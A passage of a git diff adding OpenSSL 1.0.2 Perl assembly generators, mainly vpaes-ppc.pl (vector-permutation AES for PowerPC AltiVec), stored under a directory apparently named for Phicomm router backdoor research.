+	.rva	.Lecb_enc_info
+
+	.rva	.Lecb_dec_prologue
+	.rva	.Lecb_dec_epilogue
+	.rva	.Lecb_dec_info
+___
+$code.=<<___;
+	.rva	.Lcbc_dec_prologue
+	.rva	.Lcbc_dec_epilogue
+	.rva	.Lcbc_dec_info
+
+	.rva	.Lctr_enc_prologue
+	.rva	.Lctr_enc_epilogue
+	.rva	.Lctr_enc_info
+
+	.rva	.Lxts_enc_prologue
+	.rva	.Lxts_enc_epilogue
+	.rva	.Lxts_enc_info
+
+	.rva	.Lxts_dec_prologue
+	.rva	.Lxts_dec_epilogue
+	.rva	.Lxts_dec_info
+
+.section	.xdata
+.align	8
+___
+$code.=<<___ if ($ecb);
+.Lecb_enc_info:
+	.byte	9,0,0,0
+	.rva	se_handler
+	.rva	.Lecb_enc_body,.Lecb_enc_epilogue	# HandlerData[]
+.Lecb_dec_info:
+	.byte	9,0,0,0
+	.rva	se_handler
+	.rva	.Lecb_dec_body,.Lecb_dec_epilogue	# HandlerData[]
+___
+$code.=<<___;
+.Lcbc_dec_info:
+	.byte	9,0,0,0
+	.rva	se_handler
+	.rva	.Lcbc_dec_body,.Lcbc_dec_epilogue	# HandlerData[]
+.Lctr_enc_info:
+	.byte	9,0,0,0
+	.rva	se_handler
+	.rva	.Lctr_enc_body,.Lctr_enc_epilogue	# HandlerData[]
+.Lxts_enc_info:
+	.byte	9,0,0,0
+	.rva	se_handler
+	.rva	.Lxts_enc_body,.Lxts_enc_epilogue	# HandlerData[]
+.Lxts_dec_info:
+	.byte	9,0,0,0
+	.rva	se_handler
+	.rva	.Lxts_dec_body,.Lxts_dec_epilogue	# HandlerData[]
+___
+}
+
+$code =~ s/\`([^\`]*)\`/eval($1)/gem;
+
+print $code;
+
+close STDOUT;
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/aes/asm/vpaes-ppc.pl b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/aes/asm/vpaes-ppc.pl
new file mode 100644
index 0000000..7fda60e
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/aes/asm/vpaes-ppc.pl
@@ -0,0 +1,1512 @@
+#!/usr/bin/env perl
+
+######################################################################
+## Constant-time SSSE3 AES core implementation.
+## version 0.1
+##
+## By Mike Hamburg (Stanford University), 2009
+## Public domain.
+##
+## For details see http://shiftleft.org/papers/vector_aes/ and
+## http://crypto.stanford.edu/vpaes/.
+
+# CBC encrypt/decrypt performance in cycles per byte processed with
+# 128-bit key.
+#
+#		aes-ppc.pl		this
+# G4e		35.5/52.1/(23.8)	11.9(*)/15.4
+# POWER6	42.7/54.3/(28.2)	63.0/92.8(**)
+# POWER7	32.3/42.9/(18.4)	18.5/23.3
+#
+# (*)	This is ~10% worse than reported in paper. The reason is
+#	twofold. This module doesn't make any assumption about
+#	key schedule (or data for that matter) alignment and handles
+#	it in-line. Secondly it, being transliterated from
+#	vpaes-x86_64.pl, relies on "nested inversion" better suited
+#	for Intel CPUs.
+# (**)	Inadequate POWER6 performance is due to astronomic AltiVec
+#	latency, 9 cycles per simple logical operation.
+
+$flavour = shift;
+
+if ($flavour =~ /64/) {
+	$SIZE_T	=8;
+	$LRSAVE	=2*$SIZE_T;
+	$STU	="stdu";
+	$POP	="ld";
+	$PUSH	="std";
+	$UCMP	="cmpld";
+} elsif ($flavour =~ /32/) {
+	$SIZE_T	=4;
+	$LRSAVE	=$SIZE_T;
+	$STU	="stwu";
+	$POP	="lwz";
+	$PUSH	="stw";
+	$UCMP	="cmplw";
+} else { die "nonsense $flavour"; }
+
+$sp="r1";
+$FRAME=6*$SIZE_T+13*16;	# 13*16 is for v20-v31 offload
+
+$0 =~ m/(.*[\/\\])[^\/\\]+$/; $dir=$1;
+( $xlate="${dir}ppc-xlate.pl" and -f $xlate ) or
+( $xlate="${dir}../../perlasm/ppc-xlate.pl" and -f $xlate) or
+die "can't locate ppc-xlate.pl";
+
+open STDOUT,"| $^X $xlate $flavour ".shift || die "can't call $xlate: $!";
+
+$code.=<<___;
+.machine	"any"
+
+.text
+
+.align	7	# totally strategic alignment
+_vpaes_consts:
+Lk_mc_forward:	# mc_forward
+	.long	0x01020300, 0x05060704, 0x090a0b08, 0x0d0e0f0c	?inv
+	.long	0x05060704, 0x090a0b08, 0x0d0e0f0c, 0x01020300	?inv
+	.long	0x090a0b08, 0x0d0e0f0c, 0x01020300, 0x05060704	?inv
+	.long	0x0d0e0f0c, 0x01020300, 0x05060704, 0x090a0b08	?inv
+Lk_mc_backward:	# mc_backward
+	.long	0x03000102, 0x07040506, 0x0b08090a, 0x0f0c0d0e	?inv
+	.long	0x0f0c0d0e, 0x03000102, 0x07040506, 0x0b08090a	?inv
+	.long	0x0b08090a, 0x0f0c0d0e, 0x03000102, 0x07040506	?inv
+	.long	0x07040506, 0x0b08090a, 0x0f0c0d0e, 0x03000102	?inv
+Lk_sr:		# sr
+	.long	0x00010203, 0x04050607, 0x08090a0b, 0x0c0d0e0f	?inv
+	.long	0x00050a0f, 0x04090e03, 0x080d0207, 0x0c01060b	?inv
+	.long	0x0009020b, 0x040d060f, 0x08010a03, 0x0c050e07	?inv
+	.long	0x000d0a07, 0x04010e0b, 0x0805020f, 0x0c090603	?inv
+
+##
+## "Hot" constants
+##
+Lk_inv:		# inv, inva
+	.long	0xf001080d, 0x0f06050e, 0x020c0b0a, 0x09030704	?rev
+	.long	0xf0070b0f, 0x060a0401, 0x09080502, 0x0c0e0d03	?rev
+Lk_ipt:		# input transform (lo, hi)
+	.long	0x00702a5a, 0x98e8b2c2, 0x08782252, 0x90e0baca	?rev
+	.long	0x004d7c31, 0x7d30014c, 0x81ccfdb0, 0xfcb180cd	?rev
+Lk_sbo:		# sbou, sbot
+	.long	0x00c7bd6f, 0x176dd2d0, 0x78a802c5, 0x7abfaa15	?rev
+	.long	0x006abb5f, 0xa574e4cf, 0xfa352b41, 0xd1901e8e	?rev
+Lk_sb1:		# sb1u, sb1t
+	.long	0x0023e2fa, 0x15d41836, 0xefd92e0d, 0xc1ccf73b	?rev
+	.long	0x003e50cb, 0x8fe19bb1, 0x44f52a14, 0x6e7adfa5	?rev
+Lk_sb2:		# sb2u, sb2t
+	.long	0x0029e10a, 0x4088eb69, 0x4a2382ab, 0xc863a1c2	?rev
+	.long	0x0024710b, 0xc6937ae2, 0xcd2f98bc, 0x55e9b75e	?rev
+
+##
+##  Decryption stuff
+##
+Lk_dipt:	# decryption input transform
+	.long	0x005f540b, 0x045b500f, 0x1a454e11, 0x1e414a15	?rev
+	.long	0x00650560, 0xe683e386, 0x94f191f4, 0x72177712	?rev
+Lk_dsbo:	# decryption sbox final output
+	.long	0x0040f97e, 0x53ea8713, 0x2d3e94d4, 0xb96daac7	?rev
+	.long	0x001d4493, 0x0f56d712, 0x9c8ec5d8, 0x59814bca	?rev
+Lk_dsb9:	# decryption sbox output *9*u, *9*t
+	.long	0x00d6869a, 0x53031c85, 0xc94c994f, 0x501fd5ca	?rev
+	.long	0x0049d7ec, 0x89173bc0, 0x65a5fbb2, 0x9e2c5e72	?rev
+Lk_dsbd:	# decryption sbox output *D*u, *D*t
+	.long	0x00a2b1e6, 0xdfcc577d, 0x39442a88, 0x139b6ef5	?rev
+	.long	0x00cbc624, 0xf7fae23c, 0xd3efde15, 0x0d183129	?rev
+Lk_dsbb:	# decryption sbox output *B*u, *B*t
+	.long	0x0042b496, 0x926422d0, 0x04d4f2b0, 0xf6462660	?rev
+	.long	0x006759cd, 0xa69894c1, 0x6baa5532, 0x3e0cfff3	?rev
+Lk_dsbe:	# decryption sbox output *E*u, *E*t
+	.long	0x00d0d426, 0x9692f246, 0xb0f6b464, 0x04604222	?rev
+	.long	0x00c1aaff, 0xcda6550c, 0x323e5998, 0x6bf36794	?rev
+
+##
+##  Key schedule constants
+##
+Lk_dksd:	# decryption key schedule: invskew x*D
+	.long	0x0047e4a3, 0x5d1ab9fe, 0xf9be1d5a, 0xa4e34007	?rev
+	.long	0x008336b5, 0xf477c241, 0x1e9d28ab, 0xea69dc5f	?rev
+Lk_dksb:	# decryption key schedule: invskew x*B
+	.long	0x00d55085, 0x1fca4f9a, 0x994cc91c, 0x8653d603	?rev
+	.long	0x004afcb6, 0xa7ed5b11, 0xc882347e, 0x6f2593d9	?rev
+Lk_dkse:	# decryption key schedule: invskew x*E + 0x63
+	.long	0x00d6c91f, 0xca1c03d5, 0x86504f99, 0x4c9a8553	?rev
+	.long	0xe87bdc4f, 0x059631a2, 0x8714b320, 0x6af95ecd	?rev
+Lk_dks9:	# decryption key schedule: invskew x*9
+	.long	0x00a7d97e, 0xc86f11b6, 0xfc5b2582, 0x3493ed4a	?rev
+	.long	0x00331427, 0x62517645, 0xcefddae9, 0xac9fb88b	?rev
+
+Lk_rcon:	# rcon
+	.long	0xb6ee9daf, 0xb991831f, 0x817d7c4d, 0x08982a70	?asis
+Lk_s63:
+	.long	0x5b5b5b5b, 0x5b5b5b5b, 0x5b5b5b5b, 0x5b5b5b5b	?asis
+
+Lk_opt:		# output transform
+	.long	0x0060b6d6, 0x29499fff, 0x0868bede, 0x214197f7	?rev
+	.long	0x00ecbc50, 0x51bded01, 0xe00c5cb0, 0xb15d0de1	?rev
+Lk_deskew:	# deskew tables: inverts the sbox's "skew"
+	.long	0x00e3a447, 0x40a3e407, 0x1af9be5d, 0x5ab9fe1d	?rev
+	.long	0x0069ea83, 0xdcb5365f, 0x771e9df4, 0xabc24128	?rev
+.align	5
+Lconsts:
+	mflr	r0
+	bcl	20,31,\$+4
+	mflr	r12	#vvvvv "distance between . and _vpaes_consts
+	addi	r12,r12,-0x308
+	mtlr	r0
+	blr
+	.long	0
+	.byte	0,12,0x14,0,0,0,0,0
+.asciz  "Vector Permutation AES for AltiVec, Mike Hamburg (Stanford University)"
+.align	6
+___
+
+my ($inptail,$inpperm,$outhead,$outperm,$outmask,$keyperm) = map("v$_",(26..31));
+{
+my ($inp,$out,$key) = map("r$_",(3..5));
+
+my ($invlo,$invhi,$iptlo,$ipthi,$sbou,$sbot) = map("v$_",(10..15));
+my ($sb1u,$sb1t,$sb2u,$sb2t) = map("v$_",(16..19));
+my ($sb9u,$sb9t,$sbdu,$sbdt,$sbbu,$sbbt,$sbeu,$sbet)=map("v$_",(16..23));
+
+$code.=<<___;
+##
+##  _aes_preheat
+##
+##  Fills register %r10 -> .aes_consts (so you can -fPIC)
+##  and %xmm9-%xmm15 as specified below.
+##
+.align	4
+_vpaes_encrypt_preheat:
+	mflr	r8
+	bl	Lconsts
+	mtlr	r8
+	li	r11, 0xc0		# Lk_inv
+	li	r10, 0xd0
+	li	r9,  0xe0		# Lk_ipt
+	li	r8,  0xf0
+	vxor	v7, v7, v7		# 0x00..00
+	vspltisb	v8,4		# 0x04..04
+	vspltisb	v9,0x0f		# 0x0f..0f
+	lvx	$invlo, r12, r11
+	li	r11, 0x100
+	lvx	$invhi, r12, r10
+	li	r10, 0x110
+	lvx	$iptlo, r12, r9
+	li	r9,  0x120
+	lvx	$ipthi, r12, r8
+	li	r8,  0x130
+	lvx	$sbou, r12, r11
+	li	r11, 0x140
+	lvx	$sbot, r12, r10
+	li	r10, 0x150
+	lvx	$sb1u, r12, r9
+	lvx	$sb1t, r12, r8
+	lvx	$sb2u, r12, r11
+	lvx	$sb2t, r12, r10
+	blr
+	.long	0
+	.byte	0,12,0x14,0,0,0,0,0
+
+##
+##  _aes_encrypt_core
+##
+##  AES-encrypt %xmm0.
+##
+##  Inputs:
+##     %xmm0 = input
+##     %xmm9-%xmm15 as in _vpaes_preheat
+##    (%rdx) = scheduled keys
+##
+##  Output in %xmm0
+##  Clobbers  %xmm1-%xmm6, %r9, %r10, %r11, %rax
+##
+##
+.align 5
+_vpaes_encrypt_core:
+	lwz	r8, 240($key)		# pull rounds
+	li	r9, 16
+	lvx	v5, 0, $key		# vmovdqu	(%r9),	%xmm5		# round0 key
+	li	r11, 0x10
+	lvx	v6, r9, $key
+	addi	r9, r9, 16
+	?vperm	v5, v5, v6, $keyperm	# align round key
+	addi	r10, r11, 0x40
+	vsrb	v1, v0, v8		# vpsrlb	\$4,	%xmm0,	%xmm0
+	vperm	v0, $iptlo, $iptlo, v0	# vpshufb	%xmm1,	%xmm2,	%xmm1
+	vperm	v1, $ipthi, $ipthi, v1	# vpshufb	%xmm0,	%xmm3,	%xmm2
+	vxor	v0, v0, v5		# vpxor	%xmm5,	%xmm1,	%xmm0
+	vxor	v0, v0, v1		# vpxor	%xmm2,	%xmm0,	%xmm0
+	mtctr	r8
+	b	Lenc_entry
+
+.align 4
+Lenc_loop:
+	# middle of middle round
+	vperm	v4, $sb1t, v7, v2	# vpshufb	%xmm2,	%xmm13,	%xmm4	# 4 = sb1u
+	lvx	v1, r12, r11		# vmovdqa	-0x40(%r11,%r10), %xmm1	# .Lk_mc_forward[]
+	addi	r11, r11, 16
+	vperm	v0, $sb1u, v7, v3	# vpshufb	%xmm3,	%xmm12,	%xmm0	# 0 = sb1t
+	vxor	v4, v4, v5		# vpxor		%xmm5,	%xmm4,	%xmm4	# 4 = sb1u + k
+	andi.	r11, r11, 0x30		# and		\$0x30, %r11	# ... mod 4
+	vperm	v5, $sb2t, v7, v2	# vpshufb	%xmm2,	%xmm15,	%xmm5	# 4 = sb2u
+	vxor	v0, v0, v4		# vpxor		%xmm4,	%xmm0,	%xmm0	# 0 = A
+	vperm	v2, $sb2u, v7, v3	# vpshufb	%xmm3,	%xmm14,	%xmm2	# 2 = sb2t
+	lvx	v4, r12, r10		# vmovdqa	(%r11,%r10), %xmm4	# .Lk_mc_backward[]
+	addi	r10, r11, 0x40
+	vperm	v3, v0, v7, v1		# vpshufb	%xmm1,	%xmm0,	%xmm3	# 0 = B
+	vxor	v2, v2, v5		# vpxor		%xmm5,	%xmm2,	%xmm2	# 2 = 2A
+	vperm	v0, v0, v7, v4		# vpshufb	%xmm4,	%xmm0,	%xmm0	# 3 = D
+	vxor	v3, v3, v2		# vpxor		%xmm2,	%xmm3,	%xmm3	# 0 = 2A+B
+	vperm	v4, v3, v7, v1		# vpshufb	%xmm1,	%xmm3,	%xmm4	# 0 = 2B+C
+	vxor	v0, v0, v3		# vpxor		%xmm3,	%xmm0,	%xmm0	# 3 = 2A+B+D
+	vxor	v0, v0, v4		# vpxor		%xmm4,	%xmm0, %xmm0	# 0 = 2A+3B+C+D
+
+Lenc_entry:
+	# top of round
+	vsrb	v1, v0, v8		# vpsrlb	\$4,	%xmm0,	%xmm0	# 1 = i
+	vperm	v5, $invhi, $invhi, v0	# vpshufb	%xmm1,	%xmm11,	%xmm5	# 2 = a/k
+	vxor	v0, v0, v1		# vpxor		%xmm0,	%xmm1,	%xmm1	# 0 = j
+	vperm	v3, $invlo, $invlo, v1	# vpshufb	%xmm0, 	%xmm10,	%xmm3  	# 3 = 1/i
+	vperm	v4, $invlo, $invlo, v0	# vpshufb	%xmm1, 	%xmm10,	%xmm4  	# 4 = 1/j
+	vand	v0, v0, v9
+	vxor	v3, v3, v5		# vpxor		%xmm5,	%xmm3,	%xmm3	# 3 = iak = 1/i + a/k
+	vxor	v4, v4, v5		# vpxor		%xmm5,	%xmm4,	%xmm4  	# 4 = jak = 1/j + a/k
+	vperm	v2, $invlo, v7, v3	# vpshufb	%xmm3,	%xmm10,	%xmm2  	# 2 = 1/iak
+	vmr	v5, v6
+	lvx	v6, r9, $key		# vmovdqu	(%r9), %xmm5
+	vperm	v3, $invlo, v7, v4	# vpshufb	%xmm4,	%xmm10,	%xmm3	# 3 = 1/jak
+	addi	r9, r9, 16
+	vxor	v2, v2, v0		# vpxor		%xmm1,	%xmm2,	%xmm2  	# 2 = io
+	?vperm	v5, v5, v6, $keyperm	# align round key
+	vxor	v3, v3, v1		# vpxor		%xmm0,	%xmm3,	%xmm3	# 3 = jo
+	bdnz	Lenc_loop
+
+	# middle of last round
+	addi	r10, r11, 0x80
+					# vmovdqa	-0x60(%r10), %xmm4	# 3 : sbou	.Lk_sbo
+					# vmovdqa	-0x50(%r10), %xmm0	# 0 : sbot	.Lk_sbo+16
+	vperm	v4, $sbou, v7, v2	# vpshufb	%xmm2,	%xmm4,	%xmm4	# 4 = sbou
+	lvx	v1, r12, r10		# vmovdqa	0x40(%r11,%r10), %xmm1	# .Lk_sr[]
+	vperm	v0, $sbot, v7, v3	# vpshufb	%xmm3,	%xmm0,	%xmm0	# 0 = sb1t
+	vxor	v4, v4, v5		# vpxor		%xmm5,	%xmm4,	%xmm4	# 4 = sb1u + k
+	vxor	v0, v0, v4		# vpxor		%xmm4,	%xmm0,	%xmm0	# 0 = A
+	vperm	v0, v0, v7, v1		# vpshufb	%xmm1,	%xmm0,	%xmm0
+	blr
+	.long	0
+	.byte	0,12,0x14,0,0,0,0,0
+
+.globl	.vpaes_encrypt
+.align	5
+.vpaes_encrypt:
+	$STU	$sp,-$FRAME($sp)
+	li	r10,`15+6*$SIZE_T`
+	li	r11,`31+6*$SIZE_T`
+	mflr	r6
+	mfspr	r7, 256			# save vrsave
+	stvx	v20,r10,$sp
+	addi	r10,r10,32
+	stvx	v21,r11,$sp
+	addi	r11,r11,32
+	stvx	v22,r10,$sp
+	addi	r10,r10,32
+	stvx	v23,r11,$sp
+	addi	r11,r11,32
+	stvx	v24,r10,$sp
+	addi	r10,r10,32
+	stvx	v25,r11,$sp
+	addi	r11,r11,32
+	stvx	v26,r10,$sp
+	addi	r10,r10,32
+	stvx	v27,r11,$sp
+	addi	r11,r11,32
+	stvx	v28,r10,$sp
+	addi	r10,r10,32
+	stvx	v29,r11,$sp
+	addi	r11,r11,32
+	stvx	v30,r10,$sp
+	stvx	v31,r11,$sp
+	stw	r7,`$FRAME-4`($sp)	# save vrsave
+	li	r0, -1
+	$PUSH	r6,`$FRAME+$LRSAVE`($sp)
+	mtspr	256, r0			# preserve all AltiVec registers
+
+	bl	_vpaes_encrypt_preheat
+
+	?lvsl	$inpperm, 0, $inp	# prepare for unaligned access
+	lvx	v0, 0, $inp
+	addi	$inp, $inp, 15		# 15 is not a typo
+	 ?lvsr	$outperm, 0, $out
+	?lvsl	$keyperm, 0, $key	# prepare for unaligned access
+	 vnor	$outmask, v7, v7	# 0xff..ff
+	lvx	$inptail, 0, $inp	# redundant in aligned case
+	 ?vperm	$outmask, v7, $outmask, $outperm
+	 lvx	$outhead, 0, $out
+	?vperm	v0, v0, $inptail, $inpperm
+
+	bl	_vpaes_encrypt_core
+
+	vperm	v0, v0, v0, $outperm	# rotate right/left
+	vsel	v1, $outhead, v0, $outmask
+	vmr	$outhead, v0
+	stvx	v1, 0, $out
+	addi	$out, $out, 15		# 15 is not a typo
+	########
+
+	lvx	v1, 0, $out		# redundant in aligned case
+	vsel	v1, $outhead, v1, $outmask
+	stvx	v1, 0, $out
+
+	li	r10,`15+6*$SIZE_T`
+	li	r11,`31+6*$SIZE_T`
+	mtlr	r6
+	mtspr	256, r7			# restore vrsave
+	lvx	v20,r10,$sp
+	addi	r10,r10,32
+	lvx	v21,r11,$sp
+	addi	r11,r11,32
+	lvx	v22,r10,$sp
+	addi	r10,r10,32
+	lvx	v23,r11,$sp
+	addi	r11,r11,32
+	lvx	v24,r10,$sp
+	addi	r10,r10,32
+	lvx	v25,r11,$sp
+	addi	r11,r11,32
+	lvx	v26,r10,$sp
+	addi	r10,r10,32
+	lvx	v27,r11,$sp
+	addi	r11,r11,32
+	lvx	v28,r10,$sp
+	addi	r10,r10,32
+	lvx	v29,r11,$sp
+	addi	r11,r11,32
+	lvx	v30,r10,$sp
+	lvx	v31,r11,$sp
+	addi	$sp,$sp,$FRAME
+	blr
+	.long	0
+	.byte	0,12,0x04,1,0x80,0,3,0
+	.long	0
+.size	.vpaes_encrypt,.-.vpaes_encrypt
+
+.align	4
+_vpaes_decrypt_preheat:
+	mflr	r8
+	bl	Lconsts
+	mtlr	r8
+	li	r11, 0xc0		# Lk_inv
+	li	r10, 0xd0
+	li	r9,  0x160		# Ldipt
+	li	r8,  0x170
+	vxor	v7, v7, v7		# 0x00..00
+	vspltisb	v8,4		# 0x04..04
+	vspltisb	v9,0x0f		# 0x0f..0f
+	lvx	$invlo, r12, r11
+	li	r11, 0x180
+	lvx	$invhi, r12, r10
+	li	r10, 0x190
+	lvx	$iptlo, r12, r9
+	li	r9,  0x1a0
+	lvx	$ipthi, r12, r8
+	li	r8,  0x1b0
+	lvx	$sbou, r12, r11
+	li	r11, 0x1c0
+	lvx	$sbot, r12, r10
+	li	r10, 0x1d0
+	lvx	$sb9u, r12, r9
+	li	r9,  0x1e0
+	lvx	$sb9t, r12, r8
+	li	r8,  0x1f0
+	lvx	$sbdu, r12, r11
+	li	r11, 0x200
+	lvx	$sbdt, r12, r10
+	li	r10, 0x210
+	lvx	$sbbu, r12, r9
+	lvx	$sbbt, r12, r8
+	lvx	$sbeu, r12, r11
+	lvx	$sbet, r12, r10
+	blr
+	.long	0
+	.byte	0,12,0x14,0,0,0,0,0
+
+##
+##  Decryption core
+##
+##  Same API as encryption core.
+##
+.align	4
+_vpaes_decrypt_core:
+	lwz	r8, 240($key)		# pull rounds
+	li	r9, 16
+	lvx	v5, 0, $key		# vmovdqu	(%r9),	%xmm4		# round0 key
+	li	r11, 0x30
+	lvx	v6, r9, $key
+	addi	r9, r9, 16
+	?vperm	v5, v5, v6, $keyperm	# align round key
+	vsrb	v1, v0, v8		# vpsrlb	\$4,	%xmm0,	%xmm0
+	vperm	v0, $iptlo, $iptlo, v0	# vpshufb	%xmm1,	%xmm2,	%xmm2
+	vperm	v1, $ipthi, $ipthi, v1	# vpshufb	%xmm0,	%xmm1,	%xmm0
+	vxor	v0, v0, v5		# vpxor	%xmm4,	%xmm2,	%xmm2
+	vxor	v0, v0, v1		# vpxor	%xmm2,	%xmm0,	%xmm0
+	mtctr	r8
+	b	Ldec_entry
+
+.align 4
+Ldec_loop:
+#
+#  Inverse mix columns
+#
+	lvx	v0, r12, r11		# v5 and v0 are flipped
+					# vmovdqa	-0x20(%r10),%xmm4		# 4 : sb9u
+					# vmovdqa	-0x10(%r10),%xmm1		# 0 : sb9t
+	vperm	v4, $sb9u, v7, v2	# vpshufb	%xmm2,	%xmm4,	%xmm4		# 4 = sb9u
+	subi	r11, r11, 16
+	vperm	v1, $sb9t, v7, v3	# vpshufb	%xmm3,	%xmm1,	%xmm1		# 0 = sb9t
+	andi.	r11, r11, 0x30
+	vxor	v5, v5, v4		# vpxor		%xmm4,	%xmm0,	%xmm0
+					# vmovdqa	0x00(%r10),%xmm4		# 4 : sbdu
+	vxor	v5, v5, v1		# vpxor		%xmm1,	%xmm0,	%xmm0		# 0 = ch
+					# vmovdqa	0x10(%r10),%xmm1		# 0 : sbdt
+
+	vperm	v4, $sbdu, v7, v2	# vpshufb	%xmm2,	%xmm4,	%xmm4		# 4 = sbdu
+	vperm 	v5, v5, v7, v0		# vpshufb	%xmm5,	%xmm0,	%xmm0		# MC ch
+	vperm	v1, $sbdt, v7, v3	# vpshufb	%xmm3,	%xmm1,	%xmm1		# 0 = sbdt
+	vxor	v5, v5, v4		# vpxor		%xmm4,	%xmm0,	%xmm0		# 4 = ch
+					# vmovdqa	0x20(%r10),	%xmm4		# 4 : sbbu
+	vxor	v5, v5, v1		# vpxor		%xmm1,	%xmm0,	%xmm0		# 0 = ch
+					# vmovdqa	0x30(%r10),	%xmm1		# 0 : sbbt
+
+	vperm	v4, $sbbu, v7, v2	# vpshufb	%xmm2,	%xmm4,	%xmm4		# 4 = sbbu
+	vperm	v5, v5, v7, v0		# vpshufb	%xmm5,	%xmm0,	%xmm0		# MC ch
+	vperm	v1, $sbbt, v7, v3	# vpshufb	%xmm3,	%xmm1,	%xmm1		# 0 = sbbt
+	vxor	v5, v5, v4		# vpxor		%xmm4,	%xmm0,	%xmm0		# 4 = ch
+					# vmovdqa	0x40(%r10),	%xmm4		# 4 : sbeu
+	vxor	v5, v5, v1		# vpxor		%xmm1,	%xmm0,	%xmm0		# 0 = ch
+					# vmovdqa	0x50(%r10),	%xmm1		# 0 : sbet
+
+	vperm	v4, $sbeu, v7, v2	# vpshufb	%xmm2,	%xmm4,	%xmm4		# 4 = sbeu
+	vperm	v5, v5, v7, v0		# vpshufb	%xmm5,	%xmm0,	%xmm0		# MC ch
+	vperm	v1, $sbet, v7, v3	# vpshufb	%xmm3,	%xmm1,	%xmm1		# 0 = sbet
+	vxor	v0, v5, v4		# vpxor		%xmm4,	%xmm0,	%xmm0		# 4 = ch
+	vxor	v0, v0, v1		# vpxor		%xmm1,	%xmm0,	%xmm0		# 0 = ch
+
+Ldec_entry:
+	# top of round
+	vsrb	v1, v0, v8		# vpsrlb	\$4,	%xmm0,	%xmm0	# 1 = i
+	vperm	v2, $invhi, $invhi, v0	# vpshufb	%xmm1,	%xmm11,	%xmm2	# 2 = a/k
+	vxor	v0, v0, v1		# vpxor		%xmm0,	%xmm1,	%xmm1	# 0 = j
+	vperm	v3, $invlo, $invlo, v1	# vpshufb	%xmm0, 	%xmm10,	%xmm3	# 3 = 1/i
+	vperm	v4, $invlo, $invlo, v0	# vpshufb	%xmm1,	%xmm10,	%xmm4	# 4 = 1/j
+	vand	v0, v0, v9
+	vxor	v3, v3, v2		# vpxor		%xmm2,	%xmm3,	%xmm3	# 3 = iak = 1/i + a/k
+	vxor	v4, v4, v2		# vpxor		%xmm2, 	%xmm4,	%xmm4	# 4 = jak = 1/j + a/k
+	vperm	v2, $invlo, v7, v3	# vpshufb	%xmm3,	%xmm10,	%xmm2	# 2 = 1/iak
+	vmr	v5, v6
+	lvx	v6, r9, $key		# vmovdqu	(%r9),	%xmm0
+	vperm	v3, $invlo, v7, v4	# vpshufb	%xmm4,  %xmm10,	%xmm3	# 3 = 1/jak
+	addi	r9, r9, 16
+	vxor	v2, v2, v0		# vpxor		%xmm1,	%xmm2,	%xmm2	# 2 = io
+	?vperm	v5, v5, v6, $keyperm	# align round key
+	vxor	v3, v3, v1		# vpxor		%xmm0,  %xmm3,	%xmm3	# 3 = jo
+	bdnz	Ldec_loop
+
+	# middle of last round
+	addi	r10, r11, 0x80
+					# vmovdqa	0x60(%r10),	%xmm4	# 3 : sbou
+	vperm	v4, $sbou, v7, v2	# vpshufb	%xmm2,	%xmm4,	%xmm4	# 4 = sbou
+					# vmovdqa	0x70(%r10),	%xmm1	# 0 : sbot
+	lvx	v2, r12, r10		# vmovdqa	-0x160(%r11),	%xmm2	# .Lk_sr-.Lk_dsbd=-0x160
+	vperm	v1, $sbot, v7, v3	# vpshufb	%xmm3,	%xmm1,	%xmm1	# 0 = sb1t
+	vxor	v4, v4, v5		# vpxor		%xmm0,	%xmm4,	%xmm4	# 4 = sb1u + k
+	vxor	v0, v1, v4		# vpxor		%xmm4,	%xmm1,	%xmm0	# 0 = A
+	vperm	v0, v0, v7, v2		# vpshufb	%xmm2,	%xmm0,	%xmm0
+	blr
+	.long	0
+	.byte	0,12,0x14,0,0,0,0,0
+
+.globl	.vpaes_decrypt
+.align	5
+.vpaes_decrypt:
+	$STU	$sp,-$FRAME($sp)
+	li	r10,`15+6*$SIZE_T`
+	li	r11,`31+6*$SIZE_T`
+	mflr	r6
+	mfspr	r7, 256			# save vrsave
+	stvx	v20,r10,$sp
+	addi	r10,r10,32
+	stvx	v21,r11,$sp
+	addi	r11,r11,32
+	stvx	v22,r10,$sp
+	addi	r10,r10,32
+	stvx	v23,r11,$sp
+	addi	r11,r11,32
+	stvx	v24,r10,$sp
+	addi	r10,r10,32
+	stvx	v25,r11,$sp
+	addi	r11,r11,32
+	stvx	v26,r10,$sp
+	addi	r10,r10,32
+	stvx	v27,r11,$sp
+	addi	r11,r11,32
+	stvx	v28,r10,$sp
+	addi	r10,r10,32
+	stvx	v29,r11,$sp
+	addi	r11,r11,32
+	stvx	v30,r10,$sp
+	stvx	v31,r11,$sp
+	stw	r7,`$FRAME-4`($sp)	# save vrsave
+	li	r0, -1
+	$PUSH	r6,`$FRAME+$LRSAVE`($sp)
+	mtspr	256, r0			# preserve all AltiVec registers
+
+	bl	_vpaes_decrypt_preheat
+
+	?lvsl	$inpperm, 0, $inp	# prepare for unaligned access
+	lvx	v0, 0, $inp
+	addi	$inp, $inp, 15		# 15 is not a typo
+	 ?lvsr	$outperm, 0, $out
+	?lvsl	$keyperm, 0, $key
+	 vnor	$outmask, v7, v7	# 0xff..ff
+	lvx	$inptail, 0, $inp	# redundant in aligned case
+	 ?vperm	$outmask, v7, $outmask, $outperm
+	 lvx	$outhead, 0, $out
+	?vperm	v0, v0, $inptail, $inpperm
+
+	bl	_vpaes_decrypt_core
+
+	vperm	v0, v0, v0, $outperm	# rotate right/left
+	vsel	v1, $outhead, v0, $outmask
+	vmr	$outhead, v0
+	stvx	v1, 0, $out
+	addi	$out, $out, 15		# 15 is not a typo
+	########
+
+	lvx	v1, 0, $out		# redundant in aligned case
+	vsel	v1, $outhead, v1, $outmask
+	stvx	v1, 0, $out
+
+	li	r10,`15+6*$SIZE_T`
+	li	r11,`31+6*$SIZE_T`
+	mtlr	r6
+	mtspr	256, r7			# restore vrsave
+	lvx	v20,r10,$sp
+	addi	r10,r10,32
+	lvx	v21,r11,$sp
+	addi	r11,r11,32
+	lvx	v22,r10,$sp
+	addi	r10,r10,32
+	lvx	v23,r11,$sp
+	addi	r11,r11,32
+	lvx	v24,r10,$sp
+	addi	r10,r10,32
+	lvx	v25,r11,$sp
+	addi	r11,r11,32
+	lvx	v26,r10,$sp
+	addi	r10,r10,32
+	lvx	v27,r11,$sp
+	addi	r11,r11,32
+	lvx	v28,r10,$sp
+	addi	r10,r10,32
+	lvx	v29,r11,$sp
+	addi	r11,r11,32
+	lvx	v30,r10,$sp
+	lvx	v31,r11,$sp
